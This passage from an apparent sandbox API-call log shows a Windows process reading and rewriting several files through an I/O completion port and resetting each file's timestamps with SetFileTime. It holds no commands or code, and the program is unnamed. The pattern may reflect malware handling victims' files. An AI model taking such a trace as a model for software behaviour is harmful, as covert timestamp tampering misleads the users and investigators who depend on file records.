CloseHandle (hObject=0x3b4) returned 1 [0079.834] free (_Block=0x206b860) [0079.834] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0079.851] ReadFile (in: hFile=0x3bc, lpBuffer=0x20abb14, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0079.851] GetLastError () returned 0x3e5 [0079.851] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0079.851] SetFileTime (hFile=0x3bc, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.851] CloseHandle (hObject=0x3bc) returned 1 [0079.855] free (_Block=0x20abae0) [0079.856] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0079.974] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0079.975] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0079.975] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0079.975] free (_Block=0x2060778) [0079.975] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0079.975] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0079.976] free (_Block=0x2062da0) [0079.976] free (_Block=0x53fcc0) [0079.977] free (_Block=0x2062eb8) [0079.977] WriteFile (in: hFile=0x3b8, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0079.977] GetLastError () returned 0x3e5 [0079.977] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0079.982] WriteFile (in: hFile=0x3b8, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0079.983] GetLastError () returned 0x3e5 [0079.983] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0080.174] SetFileTime (hFile=0x3b8, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0080.174] CloseHandle (hObject=0x3b8) returned 1 [0080.177] free (_Block=0x20abae0) [0080.177] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0080.186] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0080.187] GetLastError () returned 0x3e5 [0080.187] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0080.218] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0080.218] CloseHandle (hObject=0x3b0) returned 1 [0080.220] free (_Block=0x206b860) [0080.220] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0080.243] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0080.243] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0080.243] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0080.244] free (_Block=0x2060778) [0080.245] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0080.245] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0080.246] free (_Block=0x2062da0) [0080.246] free (_Block=0x53fcc0) [0080.247] free (_Block=0x2062eb8) [0080.247] WriteFile (in: hFile=0x3b8, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0080.247] GetLastError () returned 0x3e5 [0080.247] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0080.273] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0080.405] CloseHandle (hObject=0x3b0) returned 1 [0080.407] free (_Block=0x20ebb50) [0080.409] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0080.649] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x45e, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0080.649] GetLastError () returned 0x3e5 [0080.649] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0080.658] ReadFile (in: hFile=0x3b0, lpBuffer=0x394007c, nNumberOfBytesToRead=0x188, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0080.658] GetLastError () returned 0x3e5 [0080.658] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0080.998] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0xc4e, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0080.998] GetLastError () returned 0x3e5 [0080.998] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0081.005] ReadFile (in: hFile=0x3b8, lpBuffer=0x20abb14, nNumberOfBytesToRead=0xf7, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0081.005] GetLastError () returned 0x3e5 [0081.005] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0081.307] SetFileTime (hFile=0x3b8, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0081.308] CloseHandle (hObject=0x3b8) returned 1 [0081.311] free (_Block=0x20abae0) [0081.311] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0081.319] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0081.319] GetLastError () returned 0x3e5 [0081.319] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0081.328] ReadFile (in: hFile=0x3c0, lpBuffer=0x394007c, nNumberOfBytesToRead=0x269, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0081.328] GetLastError () returned 0x3e5 [0081.329] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0081.352] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0081.352] CloseHandle (hObject=0x3c0) returned 1 [0081.356] free (_Block=0x3940048) [0081.356] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0081.762] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0081.762] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0081.762] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0081.763] free (_Block=0x2060778) [0081.763] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0081.763] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0081.764] free (_Block=0x2062da0) [0081.764] free (_Block=0x53fcc0) [0081.764] free (_Block=0x2062eb8) [0081.764] WriteFile (in: hFile=0x3b8, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0081.765] GetLastError () returned 0x3e5 [0081.765] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0081.890] WriteFile (in: hFile=0x3b8, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x40f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0081.894] GetLastError () returned 0x3e5 [0081.894] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0081.915] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0081.915] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0081.915] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0081.916] free (_Block=0x2060778) [0081.916] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0081.916] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0081.917] free (_Block=0x2062da0) [0081.917] free (_Block=0x53fcc0) [0081.917] free (_Block=0x2062eb8) [0081.917] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0081.918] GetLastError () returned 0x3e5 [0081.918] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0081.933] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x3b00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0081.934] GetLastError () returned 0x3e5 [0081.934] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0081.945] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0081.945] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0081.945] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0081.946] free (_Block=0x2060778) [0081.946] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0081.946] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0081.947] free (_Block=0x2062da0) [0081.947] free (_Block=0x53fcc0) [0081.947] free (_Block=0x2062eb8) [0081.948] WriteFile (in: hFile=0x3b8, lpBuffer=0x20abb14, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0081.948] GetLastError () returned 0x3e5 [0081.948] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0081.966] WriteFile (in: hFile=0x3b8, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x2650, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0081.966] GetLastError () returned 0x3e5 [0081.966] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0081.975] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x2b3b, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0081.988] GetLastError () returned 0x3e5 [0081.988] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0081.995] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0081.995] CloseHandle (hObject=0x3b0) returned 1 [0081.998] free (_Block=0x206b860) [0081.999] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0082.014] ReadFile (in: hFile=0x3c0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x2ac3, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0082.015] GetLastError () returned 0x3e5 [0082.015] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0082.015] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0082.015] CloseHandle (hObject=0x3c0) returned 1 [0082.018] free (_Block=0x20abae0) [0082.018] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0082.021] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0082.022] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0082.022] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0082.022] free (_Block=0x2060778) [0082.022] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0082.022] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0082.023] free (_Block=0x2062da0) [0082.023] free (_Block=0x53fcc0) [0082.023] free (_Block=0x2062eb8) [0082.023] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0082.023] GetLastError () returned 0x3e5 [0082.023] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0082.025] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x9660, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0082.026] GetLastError () returned 0x3e5 [0082.026] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0082.741] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x4c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0082.743] GetLastError () returned 0x3e5 [0082.743] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0082.744] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0082.744] CloseHandle (hObject=0x3c0) returned 1 [0082.745] free (_Block=0x206b860) [0082.745] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0082.759] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0082.759] CloseHandle (hObject=0x3c0) returned 1 [0082.759] free (_Block=0x206b860) [0082.759] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0082.780] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0082.780] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0082.780] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0082.780] free (_Block=0x2060778) [0082.780] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0082.780] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0082.780] free (_Block=0x2062da0) [0082.780] free (_Block=0x53fcc0) [0082.780] free (_Block=0x2062eb8) [0082.780] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0082.781] GetLastError () returned 0x3e5 [0082.781] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0082.781] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0082.781] GetLastError () returned 0x3e5 [0082.781] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0082.808] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x1d7, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0082.808] GetLastError () returned 0x3e5 [0082.808] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0082.809] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0082.809] CloseHandle (hObject=0x3c0) returned 1 [0082.812] free (_Block=0x206b860) [0082.812] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0082.815] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0082.815] CloseHandle (hObject=0x3c0) returned 1 [0082.815] free (_Block=0x206b860) [0082.815] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0083.359] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0083.359] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0083.359] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0083.359] free (_Block=0x2060778) [0083.359] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0083.359] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0083.359] free (_Block=0x2062da0) [0083.359] free (_Block=0x53fcc0) [0083.359] free (_Block=0x2062eb8) [0083.359] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0083.360] GetLastError () returned 0x3e5 [0083.360] 